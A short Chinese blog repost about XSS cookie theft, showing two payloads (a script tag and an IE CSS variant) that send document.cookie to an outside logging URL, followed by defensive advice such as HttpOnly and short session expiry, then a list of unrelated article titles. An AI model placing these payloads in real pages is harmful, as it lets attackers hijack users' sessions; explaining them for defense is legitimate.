xss攻击之窃取用户cookie
来源:互联网 发布:mac上浏览图片的软件 编辑:程序博客网 时间:2024/06/05 09:54
引用链接:https://blog.fundebug.com/2017/08/16/xss_steal_cookie/
下面的的JavaScript代码就可以窃取Cookie,是不是很简单?
<script>new Image().src="http://jehiah.com/_sandbox/log.cgi?c="+encodeURI(document.cookie);</script>
在IE浏览器上,可以通过在CSS代码中执行JavaScript来窃取Cookie,也很简单。
<style>.getcookies{ background-image:url('javascript:new Image().src="http://jehiah.com/_sandbox/log.cgi?c=" + encodeURI(document.cookie);');}</style><p class="getcookies"></p>
为了保证安全:请不停地重设session的重设;将过期时间设置短一些;监控referrer与userAgent的值;使用HttpOnly禁止脚本读取Cookie。这些措施并非万无一失,但是增加了黑客的难度,因此也是有效的。
阅读全文
1 0
- xss攻击之窃取用户cookie
- XSS攻击之窃取Cookie
- xss之cookie窃取
- ③Cookie窃取攻击
- 利用flex秘密窃取商业网站的Cookie(XSS跨站攻击)-----luodfu
- 利用XSS窃取cookie的php脚本
- 利用xss漏洞窃取cookie登录
- xss之用户提交脚本攻击
- XSS之截获某用户cookie信息
- webx之XSS攻击
- 06-浅谈MITM攻击之信息窃取
- 浅谈MITM攻击之信息窃取(
- xss跨站攻击 cookie设置
- web安全之xss 攻击
- 安全测试之XSS攻击
- web安全 之 xss攻击
- 前端安全之XSS攻击
- 前端安全之XSS攻击
- Mysql的简介与安装
- 【kong系列八】之HMAC认证hmac-auth插件
- Android EditText 手机号输入分段显示,回删也能正常显示
- HDU-2017"百度之星"程序设计大赛-复赛-1005-Valley Numer
- dp 数塔 经典动态规划问题
- xss攻击之窃取用户cookie
- Android中自定义checkbox样式
- 搭建1对1 C\S模型
- Hibernate的文件配置(一)
- Ubuntu配置NDK
- sass实现七色卡
- 新类库中的构件
- 51nod 1133 不重叠的线段
- 牛客网牛牛求最长DNA片段的编程题